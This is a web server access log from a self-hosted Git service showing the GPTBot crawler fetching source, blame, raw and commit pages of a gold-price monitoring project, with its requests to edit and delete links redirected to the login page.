AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/notifier.py" +[17/Feb/2026:17:30:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldPilot/data_fetcher" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher" +[17/Feb/2026:17:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldPilot/data_fetcher" +[17/Feb/2026:17:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__" [Client 74.7.227.38] [Length 10588] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher" +[17/Feb/2026:17:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 12427] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher" +[17/Feb/2026:17:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 13176] [Gzip 3.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher" +[17/Feb/2026:17:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 12682] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher" +[17/Feb/2026:17:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 13269] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher" +[17/Feb/2026:17:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 13343] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher" +[17/Feb/2026:17:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 9779] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/ReadMe.md" +[17/Feb/2026:17:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher" [Client 74.7.227.38] [Length 9781] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher" +[17/Feb/2026:17:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 9780] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/notifier.py" +[17/Feb/2026:17:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 11776] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:17:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 9781] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.log" +[17/Feb/2026:17:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher/__pycache__" [Client 74.7.227.38] [Length 9795] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:17:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 9811] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" +[17/Feb/2026:17:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 1531] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/api_fetcher.py" +[17/Feb/2026:17:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 11747] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" +[17/Feb/2026:17:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 9805] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" +[17/Feb/2026:17:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 635] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" +[17/Feb/2026:17:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 1858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__init__.py" +[17/Feb/2026:17:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 894] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" +[17/Feb/2026:17:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 12818] [Gzip 5.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" +[17/Feb/2026:17:30:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:17:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:17:30:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:17:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:17:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/api_fetcher.py" +[17/Feb/2026:17:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 890] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" +[17/Feb/2026:17:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" +[17/Feb/2026:17:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 12073] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" +[17/Feb/2026:17:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 12849] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/api_fetcher.py" +[17/Feb/2026:17:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 1494] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" +[17/Feb/2026:17:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 896] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" +[17/Feb/2026:17:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 9808] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" +[17/Feb/2026:17:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 9798] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/api_fetcher.py" +[17/Feb/2026:17:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 878] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__init__.py" +[17/Feb/2026:17:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 12950] [Gzip 5.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__init__.py" +[17/Feb/2026:17:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 9800] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__init__.py" +[17/Feb/2026:17:30:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" +[17/Feb/2026:17:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" +[17/Feb/2026:17:30:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py?display=source" [Client 74.7.227.38] [Length 12444] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" +[17/Feb/2026:17:30:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py?display=source" [Client 74.7.227.38] [Length 12697] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" +[17/Feb/2026:17:30:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" +[17/Feb/2026:17:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" +[17/Feb/2026:17:30:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" +[17/Feb/2026:17:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher/investing_fetcher.py" +[17/Feb/2026:17:30:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" +[17/Feb/2026:17:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" +[17/Feb/2026:17:30:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" +[17/Feb/2026:17:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" +[17/Feb/2026:17:30:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" +[17/Feb/2026:17:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/data_fetcher/investing_fetcher.py" +[17/Feb/2026:17:30:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" +[17/Feb/2026:17:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" +[17/Feb/2026:17:30:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" +[17/Feb/2026:17:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" +[17/Feb/2026:17:30:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/api_fetcher.py" +[17/Feb/2026:17:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/api_fetcher.py" +[17/Feb/2026:17:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/investing_fetcher.py?display=source" [Client 74.7.227.38] [Length 13282] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" +[17/Feb/2026:17:30:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" +[17/Feb/2026:17:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/investing_fetcher.py" +[17/Feb/2026:17:30:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 